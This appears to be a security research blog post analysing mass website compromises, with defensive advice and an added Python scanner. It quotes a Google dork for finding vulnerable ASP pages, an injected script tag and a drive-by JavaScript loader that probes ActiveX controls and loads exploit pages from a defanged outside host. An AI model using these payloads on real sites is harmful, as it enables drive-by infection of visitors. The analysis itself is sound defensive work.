It seems Internet users do not have any peace anymore. We have witnessed a lot of security issues on
the Internet to date, but never a period like this latest one, which, from my personal perspective, could be named
“the age of compromised websites”.
The Anti-Malware research community is getting increasing daily reports relating to innocent websites
being compromised and “infected” by malicious scripts redirecting the victim users to malicious hosts which
serve and drop Malware.
This kind of attack is not new, and we have been working to get a general idea of what happens during these
attacks, but so far it has not been very clear how the attackers operate.
We have received reports of dozens and dozens of compromised websites containing iframes (see http://en.wikipedia.org/wiki/IFrame for an explanation of iframes) redirecting users to many Chinese
malicious hosts.
What we are sure of is that malicious individuals are using automated tools to exploit the websites.
A common exploit strategy used is: 1) perform a scan using some search engines like Google, for example,
in order to find potentially vulnerable applications and then 2) exploit them. The exploit in this scenario consists of
an SQL statement that tries to inject a script tag into every HTML page on the vulnerable website. In the end, the attacker finds a weakness in the website and plants their malicious code there, thus “infecting” the website.
A tool currently under analysis, and recently identified as the one responsible for many “infected” websites,
comes directly from the Chinese underground and looks like this:

As shown in the screenshot above, the tool scans a bunch of websites using the Google search engine,
looking for vulnerable websites matching, in this case, the query string inurl:".asp" inurl:"a=".
The tool is configurable, so any vulnerability signature string can be set to launch the attack.
Another interesting part of the tool is the malicious JavaScript code that gets injected into the vulnerable
websites, compromising them (see below):

As shown, the form in this case is configured to inject the string:
<script src=http://www<dot>2117966<dot>net/*uckjp.js></script>
Dissecting the malicious javascript file we find further interesting information:
…
{document.write ("<iframe width=-1 height=-1 src=\"hxxp://www<dot>2117966<dot>net/q.htm\"></iframe>");}
else
{document.write ("<script src=http:\/\/www<dot>2117966<dot>net\/Xjp.js><\/script>");}
…
The code above shows that the main JavaScript file leads to further malicious content, still hosted on the same
host (2117966.net).
Content of q.htm:
…
document.write("<script src=http://www<dot>2117966<dot>net/Ajax.gif><\/script>")
document.write("<iframe width='0' height='0' src='http://www<dot>2117966<dot>net/Ms06014.htm'></iframe>")}
else{
// Each try/catch/finally block below probes for one installed ActiveX control: if the
// object can be created, the error variable stays undefined and the matching page is loaded.
try{var r;var reals=new window["ActiveXObject"]("IERPCtl.IERPCtl.1");} // RealPlayer control
catch(r){};
finally{if(r!="[object Error]"){
document.write("<script src=http://www<dot>2117966<dot>net/Real.js><\/script>")}}
try{var g;var storm=new window["ActiveXObject"]("MPS.StormPlayer");} // Baofeng Storm Player control
catch(g){};
finally{if(g!="[object Error]"){
document.write("<script src=http://www<dot>2117966<dot>net/Bfyy.gif><\/script>")}}
try{var i;var thunder=new window["ActiveXObject"]("DPClient.Vod");} // Xunlei Thunder control
catch(i){};
finally{if(i!="[object Error]"){
document.write("<script src=http://www<dot>2117966<dot>net/Ms07004.html><\/script>")}}
try{var j;var lianzhong=new window["ActiveXObject"]("GLCHAT.GLChatCtrl.1");} // GlobalLink (Lianzhong) chat control
catch(j){};
finally{if(j!="[object Error]"){
document.write("<script src=http://www<dot>2117966<dot>net/ms06067.js><\/script>")}
// Fallback when none of the four controls is present: load yet another hidden iframe.
if(r=="[object Error]"&&g=="[object Error]"&&i=="[object Error]"&&j=="[object Error]"){
document.write("<iframe width='0' height='0' src='http://www<dot>2117966<dot>net/QVod.html'></iframe>")}}
…
The various iframes shown in the code above lead to other malicious pages and scripts, which in turn
lead to yet more malicious scripts and pages, creating a really complex chain of nested links that drops,
at the end of the chain, dangerous malware on the victim machines.
What can a user do?
It is not easy to tell whether a website is “infected” or not. Many users report that they simply browsed a website
and then became “infected.” This scenario doesn’t make you feel very well protected, especially if you are careful about
where you browse. As a result of this type of attack, a website that would normally be considered innocent or
benign can stealthily become malicious. One day the site is safe, the next it is dangerous. This is what makes
this type of attack so effective.
From the user side, a safe approach is to keep your anti-virus and anti-spyware software up to date. Additionally,
one may consider setting Internet Explorer to prompt the user before following an iframe (see instructions here: http://support.microsoft.com/kb/182569/en-us). Lastly, one may consider the use of content filtering tools.
These tools are able to block malicious JavaScript and alert the user before they are redirected to another website. Remember, it is typically the website that you are redirected to that hosts the malware that gets downloaded to
your computer.
What can a website owner do?
From the website owner’s point of view, it is recommended to scan their webpages looking for known
vulnerabilities. This step alone will eliminate the majority of exploit vectors. Of course there are potentially
unknown, or “zero-day”, vulnerabilities, but closing the known ones will greatly reduce the vulnerabilities
that are most commonly exploited via automated tools. Additionally, website owners can consider the security
help-service provided by search engines as described here.
Needless to say, it is strongly recommended to keep web servers up to date with the latest released patches;
this would hugely decrease the number of vulnerabilities.
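As a complement to the advice above, here is an added example (not part of the original post or any tool it describes) of how a website owner could sweep their own pages for the two symptoms shown earlier: script tags pulling code from a foreign host, and iframes with zero or negative dimensions. The sample page and the host names in it are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


def _tiny(value):
    """True for width/height values such as 0, -1 or '0px' that hide an iframe."""
    if value is None:
        return False
    try:
        return int(value.strip().lower().removesuffix("px")) <= 0
    except ValueError:
        return False


class InjectedTagFinder(HTMLParser):
    """Collects (kind, src) findings for off-site scripts and hidden/off-site iframes."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def _offsite(self, src):
        host = urlparse(src).hostname  # None for relative URLs such as /js/site.js
        return host is not None and host.lower() != self.site_host

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser already strips the quotes around values
        src = a.get("src") or ""
        if tag == "script" and self._offsite(src):
            self.findings.append(("offsite-script", src))
        elif tag == "iframe":
            if _tiny(a.get("width")) or _tiny(a.get("height")):
                self.findings.append(("hidden-iframe", src))
            elif self._offsite(src):
                self.findings.append(("offsite-iframe", src))


def scan_page(html, site_host):
    """Return the suspicious tags found in one HTML document served by site_host."""
    finder = InjectedTagFinder(site_host)
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample: a normal page with one injected script tag and one hidden iframe.
SAMPLE_PAGE = """<html><head><title>Shop</title>
<script src="/js/site.js"></script>
<script src=http://bad-host.example/uckjp.js></script>
</head><body>
<iframe width="300" height="200" src="http://www.shop.example/promo.htm"></iframe>
<iframe width=0 height=0 src='http://bad-host.example/q.htm'></iframe>
<p>Welcome</p></body></html>"""

if __name__ == "__main__":
    for kind, src in scan_page(SAMPLE_PAGE, "www.shop.example"):
        print(f"{kind}: {src}")
```

Run it over a crawl of your own pages (or a dump of the database fields that feed them) and review every hit; legitimate third-party widgets will show up too, so treat the output as a worklist rather than a verdict.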